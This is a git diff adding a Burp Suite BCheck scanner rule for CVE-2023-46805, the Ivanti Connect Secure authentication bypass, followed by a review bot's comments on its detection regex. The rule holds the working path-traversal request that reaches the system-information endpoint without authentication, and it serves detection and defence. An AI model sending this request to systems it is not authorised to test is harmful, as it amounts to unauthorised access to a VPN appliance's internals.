diff --git a/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck b/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck
new file mode 100644
index 0000000..83f2b31
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck
@@ -0,0 +1,27 @@
+# https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
+# https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
+
+metadata:
+ language: v2-beta
+ name: "CVE-2023-46805 - Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass"
+ description: "Checks for CVE-2023-46805"
+ author: "trikster"
+ tags: "CVE-2023-46805", "cve", "auth-bypass", "ivanti"
+
+
+given host then
+ send request called check:
+ method: "GET"
+ path: "/api/v1/totp/user-backup-code/../../system/system-information"
+
+ if {check.response.status_code} is "200" and
+ "Content-Type: application/json" in {check.response.headers} and
+ {check.response.body} matches "(?m)\s*\{\s*\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{\s*\"name\"\s*:\s*\"\w+\"" then
+
+ report issue:
+ severity: high
+ confidence: firm
+ detail: "Application appears to be vulnerable to CVE-2023-46805."
+ remediation: "Apply vendor patches."
+
+ end if
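Review bot: The body regex in the `if` condition is stricter than the detection needs and can produce false negatives: it only matches when `"name"` is the first key inside `"software"` and its value consists solely of `\w` characters, so a response that lists another key first or carries a hyphenated product name would presumably be reported as clean. Matching only the stable object prefix is safer, e.g. `{check.response.body} matches "\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{"`; the `(?m)` flag and the leading `\s*` can be dropped too, since the pattern has no `^`/`$` anchors. A comment above `send request` should state that the check depends on the `../` segments in `path` reaching the server un-normalised, so a proxy or client that collapses them makes the result meaningless. The `remediation` text would serve the reader better if it referenced the vendor advisory for this CVE instead of the generic "Apply vendor patches."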